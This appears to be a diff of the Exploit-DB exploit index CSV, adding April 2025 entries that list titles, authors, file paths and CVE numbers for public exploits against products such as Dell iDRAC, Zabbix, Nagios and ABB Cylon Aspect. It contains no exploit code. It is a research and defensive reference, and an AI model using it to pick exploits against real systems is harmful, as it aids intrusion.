9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,,
|
||||
7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,,
|
||||
52246,exploits/hardware/remote/52246.py,"Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)",2025-04-16,Photubias,remote,hardware,,2025-04-16,2025-04-16,0,CVE-2018-1207,,,,,
|
||||
51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,,
|
||||
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
|
||||
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
|
||||
|
@ -4429,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,,2020-01-29,2020-01-30,0,,"Cross-Site Scripting (XSS)",,,,
|
||||
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7666,,,,,
|
||||
47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,,,,,,
|
||||
52240,exploits/hardware/webapps/52240.py,"FLIR AX8 1.46.16 - Remote Command Injection",2025-04-16,ub3rsick,webapps,hardware,,2025-04-16,2025-04-16,0,CVE-2022-37061,,,,,
|
||||
45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
|
||||
45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
|
||||
45606,exploits/hardware/webapps/45606.txt,"FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
|
||||
|
@ -10404,6 +10408,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
52215,exploits/multiple/hardware/52215.txt,"ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,,
|
||||
52216,exploits/multiple/hardware/52216.txt,"ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48839,,,,,
|
||||
52224,exploits/multiple/hardware/52224.txt,"ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51546,,,,,
|
||||
52231,exploits/multiple/hardware/52231.html,"ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)",2025-04-16,LiquidWorm,hardware,multiple,,2025-04-16,2025-04-16,0,CVE-2024-48846,,,,,
|
||||
52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
|
||||
52220,exploits/multiple/hardware/52220.txt,"ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,,,,,,
|
||||
52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
|
||||
|
@ -11919,6 +11924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,,
|
||||
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,,2020-04-24,2020-04-24,0,,,,,,
|
||||
38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple,,2012-11-09,2017-11-09,1,CVE-2012-4949;OSVDB-87277,,,,,https://www.securityfocus.com/bid/56474/info
|
||||
52241,exploits/multiple/webapps/52241.txt,"Ethercreative Logs 3.0.3 - Path Traversal",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-23409,,,,,
|
||||
10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple,,2009-10-13,,1,CVE-2009-3828;OSVDB-59139,,2009-11-22-EverFocus_Edsr_Exploit.tar.gz,,,
|
||||
52126,exploits/multiple/webapps/52126.py,"Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)",2025-04-05,"Al Baradi Joy",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-1234,,,,,
|
||||
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
|
||||
|
@ -11959,6 +11965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
|
||||
51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,,
|
||||
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
|
||||
52238,exploits/multiple/webapps/52238.txt,"Garage Management System 1.0 (categoriesName) - Stored XSS",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-41358,,,,,
|
||||
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
|
||||
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
|
||||
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
|
||||
|
@ -12156,7 +12163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
|
||||
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
|
||||
52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
|
||||
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
|
||||
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-16,0,CVE-2025-29471,,,,,
|
||||
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
|
||||
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
|
||||
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
|
||||
|
@ -12280,6 +12287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,,2018-12-11,2018-12-11,0,,,,,,
|
||||
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,,2018-03-12,2018-03-12,0,,,,,,
|
||||
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
|
||||
52236,exploits/multiple/webapps/52236.txt,"ProConf 6.0 - Insecure Direct Object Reference (IDOR)",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2018-16606,,,,,
|
||||
9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
|
||||
52103,exploits/multiple/webapps/52103.py,"Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass",2025-03-28,VeryLazyTech,webapps,multiple,,2025-03-28,2025-04-13,0,CVE-2024-4358,,,,,
|
||||
35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,
|
||||
|
@ -12397,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,,2019-08-27,2019-08-27,1,CVE-2019-15637,,,,,
|
||||
49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
|
||||
48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
|
||||
52228,exploits/multiple/webapps/52228.txt,"Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)",2025-04-16,"Ayato Shitomi @ Fore-Z co.ltd",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-46278,,,,,
|
||||
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,,2020-12-01,2020-12-01,0,,,,,,
|
||||
49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
|
||||
49077,exploits/multiple/webapps/49077.txt,"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution",2020-11-19,"Darren King",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
|
||||
|
@ -12463,6 +12472,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6
|
||||
47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,,2019-09-02,2020-06-18,0,,,,,,
|
||||
51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,,
|
||||
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
|
||||
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
||||
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
|
||||
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
|
||||
|
@ -13045,6 +13055,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
|
||||
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
|
||||
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
|
||||
52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
52232,exploits/php/hardware/52232.txt,"ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe,
|
||||
28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info
|
||||
21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info
|
||||
|
@ -15597,6 +15610,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
|
||||
49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
|
||||
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
|
||||
52243,exploits/php/webapps/52243.py,"Car Rental Project 1.0 - Remote Code Execution",2025-04-16,ub3rsick,webapps,php,,2025-04-16,2025-04-16,0,CVE-2020-5509,,,,,
|
||||
49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
|
||||
51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
|
||||
43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
|
||||
|
@ -22533,6 +22547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
|
||||
23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
|
||||
51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
|
||||
52245,exploits/php/webapps/52245.txt,"KodExplorer 4.52 - Open Redirect",2025-04-16,"Rahad Chowdhury",webapps,php,,2025-04-16,2025-04-16,0,,,,,,
|
||||
51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
|
||||
37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
|
||||
37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
|
||||
|
@ -24531,6 +24546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php,,2021-01-14,2021-01-18,0,CVE-2020-35578,,,,,
|
||||
3919,exploits/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,2016-10-05,1,OSVDB-36054;CVE-2007-2710;CVE-2007-2709,,,,http://www.exploit-db.comnagiosql-2.00-P00.tar.gz,
|
||||
24415,exploits/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,webapps,php,,2004-08-28,2013-01-27,1,CVE-2004-1640;OSVDB-9394,,,,,https://www.securityfocus.com/bid/11064/info
|
||||
52229,exploits/php/webapps/52229.py,"NagVis 1.9.33 - Arbitrary File Read",2025-04-16,xerosec,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-46945,,,,,
|
||||
37270,exploits/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,php,80,2015-06-12,2015-06-12,0,OSVDB-123303;OSVDB-123302;OSVDB-123301;OSVDB-123300;OSVDB-123299;OSVDB-123298;OSVDB-123297,,,,http://www.exploit-db.comkilrizzy-Nakid-CMS-f274624.tar.gz,
|
||||
13893,exploits/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,webapps,php,,2010-06-15,2010-08-31,0,,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
|
||||
13889,exploits/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,webapps,php,,2010-06-15,,0,CVE-2010-2358;OSVDB-65543,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
|
||||
|
@ -27624,6 +27640,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
42761,exploits/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)",2017-09-21,"Ishaq Mohammed",webapps,php,,2017-09-21,2017-11-17,0,CVE-2017-14618,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
|
||||
42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
|
||||
43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
|
||||
52226,exploits/php/webapps/52226.txt,"phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)",2025-04-16,CodeSecLab,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-4407,,,,,
|
||||
52235,exploits/php/webapps/52235.txt,"phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames",2025-04-16,Geo,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-55889,,,,,
|
||||
33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info
|
||||
51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
|
||||
27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info
|
||||
|
@ -30129,6 +30147,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php,,2016-12-12,2016-12-12,0,,,,,,
|
||||
49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,,2020-12-18,2020-12-18,0,,,,,,
|
||||
34689,exploits/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,webapps,php,,2009-08-27,2014-09-18,1,,,,,,https://www.securityfocus.com/bid/43376/info
|
||||
52247,exploits/php/webapps/52247.txt,"Smart Manager 8.27.0 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-0566,,,,,
|
||||
36386,exploits/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",webapps,php,,2015-03-16,2015-03-16,1,OSVDB-119631,,,,http://www.exploit-db.comsmart_php_poll.zip,
|
||||
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
|
||||
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
|
||||
|
@ -34884,6 +34903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,,2019-10-08,2019-10-10,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
|
||||
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
|
||||
50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",2022-03-10,"Hussien Misbah",webapps,php,,2022-03-10,2022-03-10,0,,,,,,
|
||||
52230,exploits/php/webapps/52230.py,"Zabbix 7.0.0 - SQL Injection",2025-04-16,m4nb4,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-42327,,,,,
|
||||
33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php,,2009-10-14,2014-05-10,1,CVE-2009-4523;OSVDB-61466,,,,,https://www.securityfocus.com/bid/36701/info
|
||||
26604,exploits/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3884;OSVDB-21197,,,,,https://www.securityfocus.com/bid/15579/info
|
||||
24235,exploits/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,webapps,php,,2004-06-24,2013-01-20,1,CVE-2004-0621;OSVDB-16040,,,,,https://www.securityfocus.com/bid/10605/info
|
||||
|
@ -35098,6 +35118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375,2017-09-11,2017-09-11,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/c91ef1f09274d7f0efaf89c3740ceca316cca0b3/modules/exploits/linux/http/docker_daemon_tcp.rb
|
||||
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",2022-01-05,"Jeremiasz Pluta",remote,python,,2022-01-05,2022-01-05,0,CVE-2021-43857,,,,,
|
||||
42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python,,2017-08-31,2017-09-01,1,CVE-2017-1000117,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/202c936868328a4fe665c9d2ea82b8f8a2610b6e/modules/exploits/multi/http/git_submodule_command_exec.rb
|
||||
